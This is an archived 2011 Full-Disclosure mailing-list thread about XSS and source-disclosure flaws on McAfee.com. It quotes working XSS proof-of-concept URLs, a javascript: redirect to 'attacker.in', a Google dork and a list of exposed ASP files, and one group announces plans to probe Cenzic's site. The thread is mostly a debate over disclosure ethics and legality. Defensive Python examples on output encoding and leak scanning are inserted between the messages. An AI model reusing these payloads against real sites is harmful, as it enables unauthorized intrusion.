way to know that. 

I understand what you're saying about them not asking people to look for bugs, 
but it IS the internet. Companies don't typically ask external people to audit 
their executables either, but people do it for a number of reasons (mainly 
education). 

If they leave their site up, people will potentially poke at it. That's just 
the way it is. If I have a vested interest in a company (be it monetary or 
simply supporting its cause), I personally want to see the site flourish, 
because I am then a part of that site. I want to make sure that my personal 
information is protected, and if I do find a bug somewhere, I report it. I 
recently found an XSS in OpenDNS's landing page, and they were very 
appreciative, very professional, and prompt to respond. This made me WANT to 
work with them further to ensure that their infrastructure was hardened to 
other forms of attack as well. I don't disclose these sorts of issues publicly, 
because I give the developers a chance to fix it, and in my past experience 
most companies are happy that I reported an issue, because I could have just as 
easily not said anything. If it does come down to it though, I follow my own 
public disclosure policy (http://talesofacoldadmin.com/disclosure.html) based 
off Rain Forest Puppy's. It basically just asks for somewhat consistent lines 
of communication after I disclose something. If the communication drops (or is 
non-existent), then it's at my own discretion to disclose it in a public forum. 

I don't HAVE to disclose anything to anyone, I CHOOSE to disclose it, but if 
choosing to disclose something (even in private) means potential legal 
troubles, then that takes away the motivation for me to disclose it in any 
form. I'm still going to be finding bugs for my own educational purposes, but 
I'll just stop disclosing them. That in itself starts to undermine the internet 
as a whole, leading to the restriction of information exchange, which is 
appalling. 

It IS technically illegal to do these sorts of tests without consent, but at 
what point DOES it become a 'test'? There's some cases, granted, in which the 
intention is clear (testing for blind SQL injections, etc) as they leave a huge 
footprint, but there's no explicitly clear line in which it becomes illegal. Is 
adding a ' to my name illegal? What if my 70+ year old grandmother did it by 
accident? Could she be persecuted as well? You can't apply the law to only some 
situations and not others. 

I also point you to one of my favorite XKCD's => http://xkcd.com/327/

Is naming your kid something like that technically illegal? Then that starts 
getting into free-speech issues, which are most certainly protected by the 
constitution. If I want my name to be "Ann  Hero", and the site 
doesn't explicitly tell me I can't do so, then how can I be expected to 
reasonably know where their boundaries are? I don't see any terms of use for 
using their website anywhere. 

This is all just my opinion though, and sorry for the long message!

Ryan

- Original Message -
From: "Thor (Hammer of God)" 
To: "Ryan Sears" , noloa...@gmail.com
Cc: "full-disclosure" 
Sent: Wednesday, March 30, 2011 2:12:37 PM GMT -05:00 US/Canada Eastern
Subject: RE: [Full-disclosure] Vulnerabilities in *McAfee.com

Well, I think there is a flip side to this, and that is the fact that no one is 
asking these people to inspect their sites for vulnerabilities.   They are 
taking it upon themselves to scan the sites actively looking for

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Thor (Hammer of God)
Well, I think there is a flip side to this, and that is the fact that no one is 
asking these people to inspect their sites for vulnerabilities.   They are 
taking it upon themselves to scan the sites actively looking for 
vulnerabilities for the sole purpose of exposing them.  They may say that they 
are doing it "to ensure that the vendors fix their problems" but it's not 
really any of their business to do so.

I think someone would be hard pressed to justify (defend) their actions when 
they basically "attack" a site that they don't own, without permission, with 
the express intent of finding a vulnerability.  That's the difference between a 
"test" and an "attack."   It doesn't matter how trivial their finds are, or 
what the outcome of the scan is, it is the fact that no one asked, nor wants 
them to do this.  

Technically, what they are doing is in fact illegal - in the US anyway.   So 
there is another aspect of this that deserves some discussion, I think.

t


>-Original Message-
>From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-
>boun...@lists.grok.org.uk] On Behalf Of Ryan Sears
>Sent: Wednesday, March 30, 2011 10:45 AM
>To: noloa...@gmail.com
>Cc: full-disclosure
>Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com
>
>Seriously. I gotta say I feel like people at Cenzic (and Mcafee for that
>matter), if anyone, should understand that an XSS should really only be
>construed as a 'criminal act' if it's indeed used to attack someone. If a
>group is taking the time out of their day to find and disclose issues to
>Mcafee, they should probably be thankful. What about finding a vulnerability
>in Mcafee's virus scanner? Could that be construed as a 'criminal act' if they
>disclose it? Where do you draw the line?
>
>Basically this sort of thing pushes the community into silence until something
>truly criminal happens. I'm not saying give anyone massive amounts of credit
>for publishing a few XSS bugs (because there's millions of them out there),
>but don't label them as a criminal for trying to help. That's just idiotic IMO.
>
>If you run an enterprise level solution for antivirus AND web vulnerability
>testing, the community understands that it's a process not unlike any other.
>There will be bugs, but it only demolishes the image of Mcafee to see them
>handle it like this in particular. If they would have been appreciative about
>it, and promptly fixed their website (or at the very least maintained friendly
>contact) this incident would have pretty much gone un-noticed.
>
>Look at LastPass as an example.
>
>http://blog.lastpass.com/2011/02/cross-site-scripting-vulnerability.html
>
>They had someone poking at their site, who managed to find an XSS bug using
>CRLF injections. They were appreciative of the find, 2.5 hrs later the issue
>was fixed, and there was that blog post about exactly what they were going to
>do about it. They took full responsibility for the fact that THEIR coding was
>to blame, and basically said 'This is what happened, and this is why it will
>probably never happen again'. This spoke hugely to me (as I'm sure it did the
>rest of the community) because it shows a company that's willing to admit it
>made a mistake, as opposed to sitting on their haunches and blaming people
>for looking for these sorts of bugs. Oh and not every customer of their
>service has to pay massive licensing fees, as there's a free version as well.
>In my mind at least this equates to a company that cares more about their
>customers that don't pay a single dime, than a company who forces people to
>pay massive amounts of coin for shaky automated scanning and services. That's
>just the way I see it though.
>
>
>Someone's gotta tell the emperor he has no clothes on.
>
>Ryan
>
>- Original Message -
>From: "Jeffrey Walton" 
>To: "YGN Ethical Hacker Group" 
>Cc: "full-disclosure" 
>Sent: Wednesday, March 30, 2011 1:05:42 PM GMT -05:00 US/Canada Eastern
>Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com
>
>On Wed, Mar 30, 2011 at 8:44 AM, YGN Ethical Hacker Group 
>wrote:
>> According to xssed.com,  there are two remaining XSS issues:
>>
>> https://kb.mcafee.com/corporate/index?page=content&id=";; alert(1); //
>> https://kc.mcafee.com/corporate/index?page=content&id=";; alert(1); //
>>
>>
>> You guys know our disclosed issues are very simple and can easily be
>> found through viewing HTML/JS source codes and simple Google Hacking
>>
>(http://www.google.com/search?q=%22%3C%25+Dim++site%3Adown

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Ryan Sears
Seriously. I gotta say I feel like people at Cenzic (and Mcafee for that 
matter), if anyone, should understand that an XSS should really only be 
construed as a 'criminal act' if it's indeed used to attack someone. If a group 
is taking the time out of their day to find and disclose issues to Mcafee, they 
should probably be thankful. What about finding a vulnerability in Mcafee's 
virus scanner? Could that be construed as a 'criminal act' if they disclose it? 
Where do you draw the line?

Basically this sort of thing pushes the community into silence until something 
truly criminal happens. I'm not saying give anyone massive amounts of credit 
for publishing a few XSS bugs (because there's millions of them out there), but 
don't label them as a criminal for trying to help. That's just idiotic IMO.

If you run an enterprise level solution for antivirus AND web vulnerability 
testing, the community understands that it's a process not unlike any other. 
There will be bugs, but it only demolishes the image of Mcafee to see them 
handle it like this in particular. If they would have been appreciative about 
it, and promptly fixed their website (or at the very least maintained friendly 
contact) this incident would have pretty much gone un-noticed.

Look at LastPass as an example. 

http://blog.lastpass.com/2011/02/cross-site-scripting-vulnerability.html

They had someone poking at their site, who managed to find an XSS bug using 
CRLF injections. They were appreciative of the find, 2.5 hrs later the issue 
was fixed, and there was that blog post about exactly what they were going to 
do about it. They took full responsibility for the fact that THEIR coding was 
to blame, and basically said 'This is what happened, and this is why it will 
probably never happen again'. This spoke hugely to me (as I'm sure it did the 
rest of the community) because it shows a company that's willing to admit it 
made a mistake, as opposed to sitting on their haunches and blaming people for 
looking for these sorts of bugs. Oh and not every customer of their service has 
to pay massive licensing fees, as there's a free version as well. In my mind at 
least this equates to a company that cares more about their customers that 
don't pay a single dime, than a company who forces people to pay massive 
amounts of coin for shaky automated scanning and services. That's just the way 
I see it though. 

Someone's gotta tell the emperor he has no clothes on.

Ryan

- Original Message -
From: "Jeffrey Walton" 
To: "YGN Ethical Hacker Group" 
Cc: "full-disclosure" 
Sent: Wednesday, March 30, 2011 1:05:42 PM GMT -05:00 US/Canada Eastern
Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com

On Wed, Mar 30, 2011 at 8:44 AM, YGN Ethical Hacker Group
 wrote:
> According to xssed.com,  there are two remaining XSS issues:
>
> https://kb.mcafee.com/corporate/index?page=content&id=";; alert(1); //
> https://kc.mcafee.com/corporate/index?page=content&id=";; alert(1); //
>
>
> You guys know our disclosed issues are very simple and can easily be
> found through viewing HTML/JS source codes and simple Google Hacking
> (http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).
>
> However,  it was criticized as 'illegal break-in' by Cenzic's CMO,
> http://www.cenzic.com/company/management/khera/,  according to Network
> World News editor - Ellen Messmer.  Thus, the next target is Cenzic
> web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner
> is.
Too funny. I wonder if Aaron Barr is consulting for Cenzic.

Jeff

>> [SNIP]


Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Jeffrey Walton
On Wed, Mar 30, 2011 at 8:44 AM, YGN Ethical Hacker Group
 wrote:
> According to xssed.com,  there are two remaining XSS issues:
>
> https://kb.mcafee.com/corporate/index?page=content&id=";; alert(1); //
> https://kc.mcafee.com/corporate/index?page=content&id=";; alert(1); //
>
>
> You guys know our disclosed issues are very simple and can easily be
> found through viewing HTML/JS source codes and simple Google Hacking
> (http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).
>
> However,  it was criticized as 'illegal break-in' by Cenzic's CMO,
> http://www.cenzic.com/company/management/khera/,  according to Network
> World News editor - Ellen Messmer.  Thus, the next target is Cenzic
> web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner
> is.
Too funny. I wonder if Aaron Barr is consulting for Cenzic.

Jeff

>> [SNIP]

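The two "remaining XSS issues" quoted above, where the id parameter carries the value "; alert(1); // , are the textbook case of a request parameter being concatenated into a JavaScript string literal: the double quote in the value closes the literal and everything after it is parsed as code. The Python below is an added illustration and is not code from this thread or from McAfee's site. It reconstructs an assumed vulnerable template of that shape, a hardened version that emits every value through a JSON-based encoder, and a small scanner that reports whether injected text ended up outside a string literal. The template text, the loadContent() call and all function names are invented for the example.

```python
import json


def js_string_literal(value):
    """Encode value as a JavaScript string literal that is safe to embed in an
    inline <script> block.

    json.dumps escapes quotes, backslashes and control characters; with
    ensure_ascii=True it also writes U+2028/U+2029 as \\u2028/\\u2029, which
    older engines treat as line terminators inside a literal.  The HTML parser
    is a separate hazard: it ends the <script> element at the first "</"
    regardless of JS quoting, so that sequence is escaped as well.
    """
    return json.dumps(value, ensure_ascii=True).replace("</", "<\\/")


def render_unsafe(page, item_id):
    """Assumed vulnerable template: request parameters are pasted straight
    into JS string literals.  A value containing a double quote closes the
    literal and whatever follows is parsed as code."""
    template = ('<script>var page = "%s"; var id = "%s"; '
                'loadContent(page, id);</script>')
    return template % (page, item_id)


def render_safe(page, item_id):
    """Hardened form of the same template: every dynamic value goes through
    the encoder, so it can only ever be string data."""
    template = ('<script>var page = %s; var id = %s; '
                'loadContent(page, id);</script>')
    return template % (js_string_literal(page), js_string_literal(item_id))


def code_outside_strings(html):
    """Return the JavaScript between the first <script> and </script> with the
    contents of string literals removed, so a caller can see whether attacker
    input became code rather than data.  Minimal scanner: handles "..." and
    '...' with backslash escapes, which is all the templates above emit."""
    start = html.index("<script>") + len("<script>")
    end = html.index("</script>", start)
    js = html[start:end]
    out, quote, i = [], None, 0
    while i < len(js):
        ch = js[i]
        if quote:
            if ch == "\\":
                i += 2          # skip the escaped character
                continue
            if ch == quote:
                quote = None
                out.append(ch)
        else:
            if ch in ('"', "'"):
                quote = ch
            out.append(ch)
        i += 1
    return "".join(out)


if __name__ == "__main__":
    payload = '"; alert(1); //'
    for name, render in (("unsafe", render_unsafe), ("safe", render_safe)):
        html = render("content", payload)
        leaked = "alert(" in code_outside_strings(html)
        print("%-6s %s\n       alert() reachable as code: %s" % (name, html, leaked))
```

The encoder is only correct for a JS string context inside a script element; a value that lands in an HTML attribute, a URL, or an event handler needs the encoding for that context instead, and a response that sets a Content-Security-Policy without 'unsafe-inline' would block the inline script altogether, which is the defence-in-depth layer for pages like this.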


Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Christian Sciberras
Thor, that's just a marketing adjective.

Just like when you're asked to buy authentic replica r0lex watches.

Cheers,
Chris.




On Wed, Mar 30, 2011 at 5:22 PM, Thor (Hammer of God)
 wrote:
> Let's see here... As an "ethical hacker group," you don't like being 
> criticized by someone as engaging in illegal activities, so you announce on a 
> public site that you are going to attack the company?   Brilliant.
> t
>
>
> -Original Message-
> From: full-disclosure-boun...@lists.grok.org.uk 
> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of YGN Ethical 
> Hacker Group
> Sent: Wednesday, March 30, 2011 5:44 AM
> To: Pablo Ximenes
> Cc: full-disclosure
> Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com
>
> According to xssed.com,  there are two remaining XSS issues:
>
> https://kb.mcafee.com/corporate/index?page=content&id=";; alert(1); // 
> https://kc.mcafee.com/corporate/index?page=content&id=";; alert(1); //
>
>
> You guys know our disclosed issues are very simple and can easily be found 
> through viewing HTML/JS source codes and simple Google Hacking 
> (http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).
>
> However,  it was criticized as 'illegal break-in' by Cenzic's CMO, 
> http://www.cenzic.com/company/management/khera/,  according to Network World 
> News editor - Ellen Messmer.  Thus, the next target is Cenzic web site. Let's 
> see how strong the Kung-Fu of Cenzic HailStorm scanner is.
>
>
> -
> Best regards,
> YGN Ethical Hacker Group
> Yangon, Myanmar (Burma)
> http://yehg.net
> Our Lab | http://yehg.net/lab
> Our Directory | http://yehg.net/hwd
>
>
>
>
> On Tue, Mar 29, 2011 at 9:01 PM, Pablo Ximenes  wrote:
>> FIY
>>
>> http://it.slashdot.org/story/11/03/28/209230/McAfees-Website-Full-of-Security-Holes
>>
>>
>> Pablo Ximenes
>> http://ximen.es/
>> http://twitter.com/pabloximenes
>>
>>
>>
>>
>> 2011/3/28 Pablo Ximenes :
>>> blog post about this: http://ximen.es/?p=469
>>>
>>> Please, don't throw stones at me.
>>>
>>> []'s
>>>
>>>
>>> Pablo Ximenes
>>> http://ximen.es/
>>> http://twitter.com/pabloximenes
>>>
>>>
>>>
>>> 2011/3/27 YGN Ethical Hacker Group 
>>>>
>>>> Vulnerabilities in *McAfee.com
>>>>
>>>>
>>>> 1. VULNERABILITY DESCRIPTION
>>>>
>>>> -> Cross Site Scripting
>>>>
>>>> http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in')
>>>>
>>>> -> Information Disclosure > Internal Hostname:
>>>>    http://www.mcafee.com/js/omniture/omniture_profile.js
>>>>
>>>>    ($ ruby host-extract.rb -a http://www.mcafee.com/js/omniture/omniture_profile.js)
>>>>
>>>> -> Information Disclosure > Source Code Disclosure:
>>>>
>>>>    view-source:http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp
>>>>    view-source:http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp
>>>>    view-source:http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
>>>>    view-source:http://download.mcafee.com/clinic/Includes/common.asp
>>>>    view-source:http://download.mcafee.com/updates/upgrade_patches.asp
>>>>    view-source:http://download.mcafee.com/updates/common/dat_common.asp
>>>>    view-source:http://download.mcafee.com/updates/updates.asp
>>>>    view-source:http://download.mcafee.com/updates/superDat.asp
>>>>    view-source:http://download.mcafee.com/eval/evaluate2.asp
>>>>    view-source:http://download.mcafee.com/common/ssi/conditionals.asp
>>>>    view-source:http://download.mcafee.com/common/ssi/errHandler_soft.asp
>>>>    view-source:http://download.mcafee.com/common/ssi/variables.asp
>>>>    view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
>>>>    view-source:http://download.mcafee.com/common/ssi/errHandle

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Thor (Hammer of God)
Let's see here... As an "ethical hacker group," you don't like being criticized 
by someone as engaging in illegal activities, so you announce on a public site 
that you are going to attack the company?   Brilliant. 
t


-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk 
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of YGN Ethical 
Hacker Group
Sent: Wednesday, March 30, 2011 5:44 AM
To: Pablo Ximenes
Cc: full-disclosure
Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com

According to xssed.com,  there are two remaining XSS issues:

https://kb.mcafee.com/corporate/index?page=content&id=";; alert(1); // 
https://kc.mcafee.com/corporate/index?page=content&id=";; alert(1); //


You guys know our disclosed issues are very simple and can easily be found 
through viewing HTML/JS source codes and simple Google Hacking 
(http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).

However,  it was criticized as 'illegal break-in' by Cenzic's CMO, 
http://www.cenzic.com/company/management/khera/,  according to Network World 
News editor - Ellen Messmer.  Thus, the next target is Cenzic web site. Let's 
see how strong the Kung-Fu of Cenzic HailStorm scanner is.


-
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar (Burma)
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd




On Tue, Mar 29, 2011 at 9:01 PM, Pablo Ximenes  wrote:
> FIY
>
> http://it.slashdot.org/story/11/03/28/209230/McAfees-Website-Full-of-Security-Holes
>
>
> Pablo Ximenes
> http://ximen.es/
> http://twitter.com/pabloximenes
>
>
>
>
> 2011/3/28 Pablo Ximenes :
>> blog post about this: http://ximen.es/?p=469
>>
>> Please, don't throw stones at me.
>>
>> []'s
>>
>>
>> Pablo Ximenes
>> http://ximen.es/
>> http://twitter.com/pabloximenes
>>
>>
>>
>> 2011/3/27 YGN Ethical Hacker Group 
>>>
>>> Vulnerabilities in *McAfee.com
>>>
>>>
>>> 1. VULNERABILITY DESCRIPTION
>>>
>>> -> Cross Site Scripting
>>>
>>> http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in')
>>>
>>> -> Information Disclosure > Internal Hostname:
>>>    http://www.mcafee.com/js/omniture/omniture_profile.js
>>>
>>>    ($ ruby host-extract.rb -a http://www.mcafee.com/js/omniture/omniture_profile.js)
>>>
>>> -> Information Disclosure > Source Code Disclosure:
>>>
>>>    view-source:http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp
>>>    view-source:http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp
>>>    view-source:http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
>>>    view-source:http://download.mcafee.com/clinic/Includes/common.asp
>>>    view-source:http://download.mcafee.com/updates/upgrade_patches.asp
>>>    view-source:http://download.mcafee.com/updates/common/dat_common.asp
>>>    view-source:http://download.mcafee.com/updates/updates.asp
>>>    view-source:http://download.mcafee.com/updates/superDat.asp
>>>    view-source:http://download.mcafee.com/eval/evaluate2.asp
>>>    view-source:http://download.mcafee.com/common/ssi/conditionals.asp
>>>    view-source:http://download.mcafee.com/common/ssi/errHandler_soft.asp
>>>    view-source:http://download.mcafee.com/common/ssi/variables.asp
>>>    view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
>>>    view-source:http://download.mcafee.com/common/ssi/errHandler.asp
>>>    view-source:http://download.mcafee.com/common/ssi/common_subs.asp
>>>    view-source:http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
>>>    view-source:http://download.mcafee.com/us/bannerAd.asp
>>>    view-source:http://download.mcafee.com/common/ssi/standard/global_foot_us.asp
>>>
>>>
>>> 2. RECOMMENDATION
>>>
>>> - Fully utilize Mcafee FoundStone Experts
>>> - Use outbound monitoring of traffic to detect potential information 
>>> leakag

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Cal Leeming
?

On Wed, Mar 30, 2011 at 1:49 PM, Benji  wrote:

> I'm sure they pjear the xss 4nd w3bbug f1nd1ng sk1llz of the renowned
> ethical hacking group YGN!!!111
>
>
> (Plzdontxssme)
>
> On 3/30/11, YGN Ethical Hacker Group  wrote:
> > According to xssed.com,  there are two remaining XSS issues:
> >
> > https://kb.mcafee.com/corporate/index?page=content&id=";; alert(1); //
> > https://kc.mcafee.com/corporate/index?page=content&id=";; alert(1); //
> >
> >
> > You guys know our disclosed issues are very simple and can easily be
> > found through viewing HTML/JS source codes and simple Google Hacking
> > (http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).
> >
> > However,  it was criticized as 'illegal break-in' by Cenzic's CMO,
> > http://www.cenzic.com/company/management/khera/,  according to Network
> > World News editor - Ellen Messmer.  Thus, the next target is Cenzic
> > web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner
> > is.
> >
> >
> > -
> > Best regards,
> > YGN Ethical Hacker Group
> > Yangon, Myanmar (Burma)
> > http://yehg.net
> > Our Lab | http://yehg.net/lab
> > Our Directory | http://yehg.net/hwd
> >
> >
> >
> >
> > On Tue, Mar 29, 2011 at 9:01 PM, Pablo Ximenes  wrote:
> >> FIY
> >>
> >>
> http://it.slashdot.org/story/11/03/28/209230/McAfees-Website-Full-of-Security-Holes
> >>
> >>
> >> Pablo Ximenes
> >> http://ximen.es/
> >> http://twitter.com/pabloximenes
> >>
> >>
> >>
> >>
> >> 2011/3/28 Pablo Ximenes :
> >>> blog post about this: http://ximen.es/?p=469
> >>>
> >>> Please, don't throw stones at me.
> >>>
> >>> []'s
> >>>
> >>>
> >>> Pablo Ximenes
> >>> http://ximen.es/
> >>> http://twitter.com/pabloximenes
> >>>
> >>>
> >>>
> >>> 2011/3/27 YGN Ethical Hacker Group 
> 
>  Vulnerabilities in *McAfee.com
> 
> 
>  1. VULNERABILITY DESCRIPTION
> 
>  -> Cross Site Scripting
> 
> 
>  http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.location.replace('attacker.in')
> 
>  -> Information Disclosure > Internal Hostname:
>     http://www.mcafee.com/js/omniture/omniture_profile.js
> 
>     ($ ruby host-extract.rb -a http://www.mcafee.com/js/omniture/omniture_profile.js)
> 
>  -> Information Disclosure > Source Code Disclosure:
> 
>     view-source:http://download.mcafee.com/clinic/includes/commoninc/cookiecommon.asp
>     view-source:http://download.mcafee.com/clinic/includes/commoninc/appcommon.asp
>     view-source:http://download.mcafee.com/clinic/includes/commoninc/partnerCodesLibrary.asp
>     view-source:http://download.mcafee.com/clinic/Includes/common.asp
>     view-source:http://download.mcafee.com/updates/upgrade_patches.asp
>     view-source:http://download.mcafee.com/updates/common/dat_common.asp
>     view-source:http://download.mcafee.com/updates/updates.asp
>     view-source:http://download.mcafee.com/updates/superDat.asp
>     view-source:http://download.mcafee.com/eval/evaluate2.asp
>     view-source:http://download.mcafee.com/common/ssi/conditionals.asp
>     view-source:http://download.mcafee.com/common/ssi/errHandler_soft.asp
>     view-source:http://download.mcafee.com/common/ssi/variables.asp
>     view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_controls.asp
>     view-source:http://download.mcafee.com/common/ssi/errHandler.asp
>     view-source:http://download.mcafee.com/common/ssi/common_subs.asp
>     view-source:http://download.mcafee.com/us/upgradeCenter/productComparison_top.asp
>     view-source:http://download.mcafee.com/us/bannerAd.asp
>     view-source:http://download.mcafee.com/common/ssi/standard/global_foot_us.asp
> 
> 
>  2. RECOMMENDATION
> 
>  - Fully utilize Mcafee FoundStone Experts
>  - Use outbound monitoring of traffic to detect potential information
>  leakage
> 
> 
>  3. VENDOR
> 
>  McAfee Inc
>  http://www.mcafee.com
> 
> 
>  4. DISCLOSURE TIME-LINE
> 
>  2011-02-10: reported vendor
>  2011-02-12: vendor replied "we are working to resolve the issue as
>  quickly as possible"
>  2011-03-27: vulnerability found to be unfixed completely
>  2011-03-27: vulnerability disclosed
> 
> 
>  5. REFERENCES
> 
>  Original Advisory URL:
> 
> 
> http://yehg.net/lab/pr0js/advisories/sites/mcafee.com/[mcafee]_xss_infoleak
>  Former Disclosure, 2008:
>  http://www.theregister.co.uk/2008/06/13/security_giants_xssed/
>  Former Disclosure, 2009:
> 
> 
> http://news.softpedia.com/news/McAfee-Websites-Vulnerable-to-Attacks-110667.shtml
>  Former Disclosure, 2010:
> 
> 
> http://security-sh3ll.blogspot.com/2010/04/mcafee-communities-xss-defacement.html
>  host
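The advisory's second recommendation, "Use outbound monitoring of traffic to detect potential information leakage", can be made concrete: inspect each response the site sends out and flag bodies that contain unexecuted server-side source (the "<% Dim" pattern behind the Google dork) or hostnames that belong to an internal network (the kind of thing host-extract.rb pulled out of omniture_profile.js). The Python below is an added example, not YGN's tool and not anything from McAfee's side; the marker patterns, the internal-hostname heuristic and the three sample responses are constructed for the example and would need tuning for a real site.

```python
import re
from urllib.parse import urlparse

# Server-side template delimiters that should never reach a client.  If one of
# these shows up in a response body, the server sent its source instead of
# executing it (the "<% Dim" Google dork in the advisory is the ASP case).
# Assumed patterns; "<%=" is deliberately excluded because client-side
# templating libraries use it legitimately.
SOURCE_MARKERS = [
    ("asp/jsp", re.compile(r"<%\s*(?:@|Dim\b|Set\b|Response\.|Server\.|Request\.)", re.I)),
    ("php", re.compile(r"<\?php\b")),
]

# Hostnames and addresses a public site has no reason to hand out: RFC 1918
# ranges, loopback, and suffixes that only resolve on a corporate network.
# Assumed heuristic; extend it with your own internal domain suffixes.
INTERNAL_HOST = re.compile(
    r"\b(?:(?:10|127)\.\d{1,3}\.\d{1,3}\.\d{1,3}"
    r"|192\.168\.\d{1,3}\.\d{1,3}"
    r"|172\.(?:1[6-9]|2\d|3[01])\.\d{1,3}\.\d{1,3}"
    r"|[a-z0-9][a-z0-9.-]*\.(?:local|internal|corp|lan|intranet))\b",
    re.I,
)


def scan_response(url, body):
    """Inspect one outbound HTTP response body and return a list of findings.
    Each finding is a dict with the url, a type and the matched text."""
    findings = []

    # 1. Unexecuted server-side source served as text.
    for lang, pattern in SOURCE_MARKERS:
        match = pattern.search(body)
        if match:
            findings.append({"url": url, "type": "source_disclosure",
                             "detail": "%s: %r" % (lang, match.group(0))})
            break

    # 2. Internal hostnames or addresses embedded in JS, HTML or config.
    #    The site's own public hostname is not a leak, so it is skipped.
    public_host = (urlparse(url).hostname or "").lower()
    seen = set()
    for match in INTERNAL_HOST.finditer(body):
        host = match.group(0).lower()
        if host != public_host and host not in seen:
            seen.add(host)
            findings.append({"url": url, "type": "internal_hostname", "detail": host})

    return findings


# Constructed sample responses (not real McAfee content).
SAMPLE_RESPONSES = [
    # An ASP include served verbatim because the server did not execute it,
    # the situation the advisory's view-source: URLs pointed at.
    ("http://download.example.com/common/ssi/variables.asp",
     '<%\nDim siteRoot, dbConn\nsiteRoot = "/common/"\n'
     'Set dbConn = Server.CreateObject("ADODB.Connection")\n%>\n<html>'),
    # Analytics JS that embeds a hostname and an address from the internal network.
    ("http://www.example.com/js/profile.js",
     'var s_account="prod";\nvar s_server="web01.corp.example.local";\n'
     'var collector="10.20.30.40";'),
    # An ordinary page; should produce no findings.
    ("http://www.example.com/index.html",
     '<html><body><a href="http://www.example.com/about">About</a>'
     '<!-- built 2011-03-27 --></body></html>'),
]


def scan_all(responses=SAMPLE_RESPONSES):
    """Run scan_response over (url, body) pairs; returns {url: findings}."""
    return {url: scan_response(url, body) for url, body in responses}


if __name__ == "__main__":
    for url, findings in scan_all().items():
        print(url)
        for f in findings:
            print("  %-18s %s" % (f["type"], f["detail"]))
```

Where this runs is an assumption: a reverse proxy, an egress tap or a WAF that can see response bodies are the usual places. Expect false positives from client-side templating that uses "<%" and from legitimate mentions of ".local" names, so the source-disclosure hit should be treated as the high-confidence signal and the hostname hit as something to review. Note also that a leaked .asp include shows only what that file contains; the real exposure is whatever the includes reference (connection strings, partner codes, error-handling paths), which is why the advisory lists so many of them.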

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

2011-03-30 Thread Benji
"However,  it was criticized as 'illegal break-in' by Cenzic's CMO,
http://www.cenzic.com/company/management/khera/,  according to Network
World News editor - Ellen Messmer.  Thus, the next target is Cenzic
web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner
is."

On Wed, Mar 30, 2011 at 2:57 PM, Cal Leeming  wrote:

> ?
>
>
> On Wed, Mar 30, 2011 at 1:49 PM, Benji  wrote:
>
>> I'm sure they pjear the xss 4nd w3bbug f1nd1ng sk1llz of the renowned
>> ethical hacking group YGN!!!111
>>
>>
>> (Plzdontxssme)
>>
>> On 3/30/11, YGN Ethical Hacker Group  wrote:
>> > According to xssed.com,  there are two remaining XSS issues:
>> >
>> > https://kb.mcafee.com/corporate/index?page=content&id=";; alert(1); //
>> > https://kc.mcafee.com/corporate/index?page=content&id=";; alert(1); //
>> >
>> >
>> > You guys know our disclosed issues are very simple and can easily be
>> > found through viewing HTML/JS source codes and simple Google Hacking
>> > (http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).
>> >
>> > However,  it was criticized as 'illegal break-in' by Cenzic's CMO,
>> > http://www.cenzic.com/company/management/khera/,  according to Network
>> > World News editor - Ellen Messmer.  Thus, the next target is Cenzic
>> > web site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner
>> > is.
>> >
>> >
>> > -
>> > Best regards,
>> > YGN Ethical Hacker Group
>> > Yangon, Myanmar (Burma)
>> > http://yehg.net
>> > Our Lab | http://yehg.net/lab
>> > Our Directory | http://yehg.net/hwd
>> >
>> >
>> >
>> >
>> > On Tue, Mar 29, 2011 at 9:01 PM, Pablo Ximenes  wrote:
>> >> FYI
>> >>
>> >>
>> http://it.slashdot.org/story/11/03/28/209230/McAfees-Website-Full-of-Security-Holes
>> >>
>> >>
>> >> Pablo Ximenes
>> >> http://ximen.es/
>> >> http://twitter.com/pabloximenes
>> >>
>> >>
>> >>
>> >>
>> >> 2011/3/28 Pablo Ximenes :
>> >>> blog post about this: http://ximen.es/?p=469
>> >>>
>> >>> Please, don't throw stones at me.
>> >>>
>> >>> []'s
>> >>>
>> >>>
>> >>> Pablo Ximenes
